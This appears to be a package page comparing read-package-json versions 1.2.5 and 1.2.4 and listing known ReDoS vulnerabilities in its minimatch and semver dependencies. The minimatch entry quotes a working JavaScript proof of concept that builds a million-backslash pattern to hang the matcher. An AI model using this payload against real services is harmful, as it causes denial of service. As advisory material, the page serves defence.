Read-package-json is a vital tool for Node.js developers, providing a robust and reliable way to parse package.json files, complete with semantic interpretation, default values, and thorough validation – just like npm itself. Comparing versions 1.2.5 and 1.2.4 reveals subtle but important refinements. Both versions share core dependencies like glob for file system path matching, lru-cache for optimized caching, graceful-fs for resilient file system operations, and normalize-package-data for standardized package metadata. A notable addition in version 1.2.5 is the github-url-from-git dependency, introduced to reliably extract GitHub repository URLs from Git configurations. This suggests improved handling of packages hosted on GitHub. Developers should note the "graceful-fs":"2 || 3" dependency, specified as an optional dependency which highlights the libraries' focus on backward compatibility and resilience in various environments. The release date difference signifies that version 1.2.5 incorporates updates released after July 25, 2014, suggesting potential bug fixes or enhancements related to GitHub URL parsing or internal optimizations. For developers leveraging read-package-json, upgrading to version 1.2.5 is recommended, particularly if your workflow involves packages sourced from GitHub repositories, to benefit from the improved URL handling this version offers.
All the vulnerabilities related to the version 1.2.5 of the package
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Regular Expression Denial of Service in semver
Versions 4.3.1 and earlier of semver are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.
Update to version 4.3.2 or later